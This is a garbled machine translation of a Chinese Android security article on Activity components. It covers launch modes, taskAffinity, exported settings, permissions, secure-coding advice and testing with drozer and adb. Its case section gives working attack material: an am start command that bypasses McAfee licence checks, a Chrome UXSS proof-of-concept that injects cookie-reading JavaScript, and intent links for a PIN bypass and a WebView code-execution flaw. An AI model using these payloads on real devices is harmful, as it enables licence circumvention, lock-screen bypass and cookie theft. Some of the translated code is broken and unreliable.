Android activtity Security (EXT)

one of Android four components--activity security details.

Original address: http://drops.wooyun.org/tips/3936 0x00 Popular Science

Each Android application is made up of basic Android components such as activity, Service, content provider, and broadcast receiver, The activity is the main body that implements the application, it undertakes a lot of display and interaction work, even can be understood as an "interface" is an activity.

Activity is a visual user interface that is displayed for user action. For example, an activity can show a list of menu items for the user to select, or display some photos with descriptions. A short message application can include an activity that displays a list of contacts that are sent to the sending object, an activity that writes text messages to the selected contact, and the activity that pages through the previous text messages and changes settings. Although together they form a cohesive user interface, each activity is kept separate from the others. Each is implemented with subclasses of the activity class as the base class.

An application can have only one activity, or a number of them, as the SMS application has just mentioned. The role of each activity, and its number, naturally depends on the application and its design. In general, there is always an application that is marked as the first one that the user sees when the application starts. The way to move from one activity to another is to start the next by the current activity.

0x01 Knowledge Essentials

Reference: http://developer.android.com/guide/components/activities.html

Life cycle

Starting mode

Show startup

Registering components in a configuration file

<activity android:name=".ExampleActivity" android:icon="@drawable/app_icon">     <intent-filter>         <action android:name="android.intent.action.MAIN" />         <category android:name="android.intent.category.LAUNCHER" />     </intent-filter></activity>

Specify application and activity startup directly using the intent object

Intent intent = new Intent(this, ExampleActivity.class);startActivity(intent);

Intent-filter's Action property is not configured, activity can only be started with display.

Private activity is recommended to use display startup.

Implicit start-up

Intent intent = new Intent(Intent.ACTION_SEND);intent.putExtra(Intent.EXTRA_EMAIL, recipientArray);startActivity(intent);

Load Modes Launch mode

There are four modes of loading for activity:

• Standard: Default behavior. Each time you start an activity, the system creates a new instance of the target task.
• singletop: If an instance of the target activity already exists at the top of the stack of the target task, the system will use that instance directly and invoke the activity's onnewintent () (No re-create)
• Singletask: Creates an instance of activity at the top of a new task's stack. If the instance already exists, the system will use the instance directly and invoke the activity's onnewintent () (No re-create)
• singleinstance: Similar to "Singletask", but no other activity is run in the target activity's task, and there is always only one activity in that task.

Set the location of the activity element's Android:launchmode property in the Androidmanifest.xml file:

<activity android:name="ActB" android:launchMode="singleTask"></activity>

Activity launch mode is used to control the creation of task and activity instances. Default "Standard" mode. Standard mode starts a new activity instance and does not create a new task, the activity that is started and the activity that is started are in the same stack. When creating a new task, the content in intent is likely to be read by a malicious application, so it is recommended that you do not configure the Launch Mode property if you do not have a special requirement to use the default standard. Launchmode can be covered by the intent flag.

Taskaffinity

Task management activity in the Android system. The name of the task depends on the affinity of the root activity.

By default, each activity in the app uses the app's package name as affinity. The assignment of a task depends on the app, so by default all activity in an app belongs to the same task. To change the assignment of a task, you can set the value of affinity in the Androidmanifest.xml file, but doing so would have the risk that the information in the intent carried by the activity will be read by other applications.

Flag_activity_new_task

An important flag in the intent flag

Setting the Flags property of the intent through the setflags () or Addflags () method when the ACTIVITY is started can change launch mode,flag_activity_new_ The task token represents the creation of a new task (the activity that was initiated is neither in the foreground nor in the background). Flag_activity_multiple_task tags can be set at the same time as Flag_activity_new_task. In this case, the task must be created, so the intent should not carry sensitive data.

Task

Stack:activity takes on a lot of display and interaction, and from a certain point of view, the application we see is a combination of many activities. In order for the many activities to work together without confusion, the Android platform has designed a stack mechanism for managing activity, which follows the principle of advanced, always showing activity at the top of the stack, The activity at the top of the stack is the last activity that is opened.

Task: Refers to grouping related activity together and managing it in the same way as the activity stack. From the user experience, an "application" is a task, but fundamentally, a task can be composed of one or more Android application

If a user leaves a task for a long time, the system cleans up the activity below the top of the stack so that when the task is reopened, the top activity is restored.

Intent Selector

When multiple activity has the same action, a selector pops up for the user to select when this action is called.

Permissions

android:exported

Whether an activity component can be launched by an external app depends on this property, and when set to true activity can be started by an external app and set to false, the activity can only be started by its own app. (Can be started with user ID or root)

The Action property of the Intent-filter is not configured exported defaults to False (no filter can only start the activity with an explicit class name), which is equivalent to the program itself. The Action property configured with Intent-filter exported is true by default.

The exported property is only used to restrict activity from being exposed to other apps, and it is possible to restrict external startup activity through permission declarations in the configuration file.

android:protectionLevel

Http://developer.android.com/intl/zh-cn/guide/topics/manifest/permission-element.html

Normal: Default value. Low-risk permissions, as long as the application can be used, the installation does not require user confirmation.

Dangerous: Permissions such as write_setting and send_sms are risky because these permissions can be used to reconfigure devices or cause charges. Use this protectionlevel to identify some of the permissions that a user might be concerned about. Android will alert users to the need for these permissions when installing the program, depending on the Android version or the mobile device installed.

Signature: These permissions are granted only to programs that are signed with the same key applied to the program.

Signatureorsystem: Similar to signature, the programs in the system need to be eligible for access, in addition to the point. This allows custom Android system applications to also gain access, and this level of protection helps integrate the system compilation process.

<!-- *** POINT 1 *** Define a permission with protectionLevel="signature" --><permissionandroid:name="org.jssec.android.permission.protectedapp.MY_PERMISSION"android:protectionLevel="signature" /><applicationandroid:icon="@drawable/ic_launcher"android:label="@string/app_name" ><!-- *** POINT 2 *** For a component, enforce the permission with its permission attribute --><activityandroid:name=".ProtectedActivity"android:exported="true"android:label="@string/app_name"android:permission="org.jssec.android.permission.protectedapp.MY_PERMISSION" ><!-- *** POINT 3 *** If the component is an activity, you must define no intent-filter --></activity>

Key methods

• OnCreate (Bundle savedinstancestate)
• Setresult (int resultcode, Intent data)
• StartActivity (Intent Intent)
• Startactivityforresult (Intent Intent, int requestcode)
• Onactivityresult (int requestcode, int resultcode, Intent data)
• Setresult (int resultcode, Intent data)
• Getstringextra (String name)
• Addflags (int flags)
• SetFlags (int flags)
• Setpackage (String PackageName)
• Getaction ()
• Setaction (String action)
• GetData ()
• SetData (Uri data)
• Getextras ()
• PutExtra (string name, String value)

0x02 activity Category

Activity types and how they are used determine their risk and defense, so the activity is categorized as follows: Private, public, parter, in-house

Private activity

Private activity should not be initiated by other applications to be relatively secure

When you create an activity:

1, do not specify taskaffinity//task management activity. The name of the task depends on the affinity of the root activity. The activity uses the package name as affinity in the default settings. The task is assigned by the app, so an app's activity belongs to the same task by default. Intent that initiate activity across a task may be read by other apps.

2, do not specify Lunchmode//default standard, we recommend using the default. When creating a new task, it is possible for other apps to read intent content.

3. Set the exported property to False

4, carefully handle the data received from the intent, regardless of whether internally sent intent

5. Sensitive information can only be operated within the application

When using activity:

6. Do not set Flag_activity_new_task tag when activating activity//flag_activity_new_task tag is used to create a new task (the activity that is started is not in the stack).

7. Open the application internal activity using display start mode

8. When Putextra () contains sensitive information, it is intended to be an activity within the app.

9. Handle return data with care and data from the same application

Public activity

A publicly exposed activity component that can be launched by any application

Create activity:

1. Set the exported property to True

2. Handle the received intent carefully

3. No sensitive information should be included when returning data

Use activity:

4. No sensitive information should be sent

5. Be cautious when you receive return data

parter, in-house section see Http://www.jssec.org/dl/android_securecoding_en.pdf

Security recommendations

• The private activity used within the app should not be configured with the Intent-filter, if Intent-filter is configured to set the exported property to False.
• Using the default taskaffinity
• Using the default Launchmode
• Intent Flag_activity_new_task tag is not set when ACTIVITY is started
• Handle the received intent with caution and the information they carry
• Signature verification Internal (in-house) app
• When activity returns data, be aware that the target activity is at risk of leaking information.
• Use display to start when activity is very clear
• The data returned by the activity is handled with care, and the data returned by the activity is likely to be spoofed by malicious application
• Verify target activity is malicious app to avoid intent spoofing, can be verified with hash signature
• When providing an Asset secondhand, the Asset should is Protected with the same level of Protection
• Do not send sensitive information as much as possible, taking into account the risk that intent information in the startup public activity could be stolen by malicious application

0x04 test method

View activity:

• Anti-compilation View the activity component in the configuration file Androidmanifest.xml (focus on configuring Intent-filter and not setting export= "false")
• Open the installed app directly with RE to view the configuration file
• Drozer Scan: Run App.activity.info-a packagename
• Dynamic View: Logcat set the filter tag to Activitymanager

Start activity:

• ADB shell:am start-a action-n package/componet
• Drozer:run App.activity.start--action Android.action.intent.VIEW ...
• Write your own app call Startactiviy () or Startactivityforresult ()
• Browser Intent Scheme remote start: http://drops.wooyun.org/tips/2893

0x05 case

Case 1: Bypass local authentication

Wooyun: Huawei Network disk android client local password bypass (non-root also available)

Bypass McAfee's key verification and activate it for free.

$ am start -a android.intent.action.MAIN -n com.wsandroid.suite/com.mcafee.main.MfeMain

Case 2: Local denial of service

Wooyun: Fast Play browser Android client local denial of service

Wooyun: Snowball Android client local denial of service vulnerability

Wooyun:tencent Messenger (QQ) Dos Vulnerability (critical)

Wooyun:tencent WeiBo multiple Dos vulnerabilities (critical)

Wooyun:android Native Settings application has a required crash (can cause a denial of service attack) (involving fragment)

Case 3: Interface hijacking

Wooyun:android using the suspended window to realize the interface hijacking the fishing thief number

Case 4:UXSS

The vulnerability exists in Chrome Android version V18.0.1025123,class "Com.google.android.apps.chrome.SimpleChromeActivity" allows a malicious app to inject JS code into any domain. Some androidmanifest.xml configuration files are as follows

  <activity android:name= "com.google.android.apps.chrome.SimpleChromeActivity" android:launchmode= " Singletask "android:configchanges=" Keyboard|keyboardhidden|orientation|screensize ">          <intent-filter>              <action android:name= "Android.intent.action.VIEW"/>              <category android:name= "Android.intent.category.DEFAULT"/>          </intent-filter></activity>  

Class "com.google.android.apps.chrome.SimpleChromeActivity" configuration but "android:exported" is not set to "false". The malicious application first calls the class and sets data to "http://google.com" again when set data to malicious JS such as ' Javascript:alert (Document.cookie) ', the malicious code will be in HTTP// google.com domain. "com.google.android.apps.chrome.SimpleChromeActivity" class can be opened via the Android API or AM (Activitymanager) . The POC is as follows

public class Testactivity extends Activity {     @Override      public void OnCreate (Bundle savedinstancestate) {         super.oncreate ( savedinstancestate);         Intent i = new Intent ();                  componentname comp = new ComponentName (                                   " Com.android.chrome ",                                       "Com.google.android.apps.chrome.SimpleChromeActivity");                  i.setcomponent (Comp);                  i.setaction ("Android.intent.action.VIEW");                  Uri data = Uri.parse ("http://google.com") ;                 I.setData ( Data);                 StartActivity (i);                      Try {                          Thread.Sleep (;   )                       }                            catch (Exception e) {}                  data = Uri.parse ("Javascript:alert (Document.cookie)");                    I.setdata (data);                  StartActivity (i);    }}

Case 5: Implicit startup intent contains sensitive data

There is no open case, attack model such as.

Case 6:fragment Injection (bypassing pin+ denial of service)

Fragment here only to mention, may later write another article.

<a href="intent:#Intent;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;SEL;action=android.settings.SETTINGS;end">16、bypass Pin android 3.0-4.3 （selector）</a><br>

<a href="intent:#Intent;S.:android:show_fragment=XXXX;launchFlags=0x00008000;SEL;component=com.android.settings/com.android.settings.Settings;end">17、fragment dos android 4.4 (selector)</a><br>

Case 7:webview RCE

<a href="intent:#Intent;component=com.gift.android/.activity.WebViewIndexActivity;S.url=http://drops.wooyun.org/webview.html;S.title=WebView;end">15、驴妈妈代码执行（fixed）</a><br>

0X06 Reference

Http://www.jssec.org/dl/android_securecoding_en.pdf

Android activtity Security (EXT)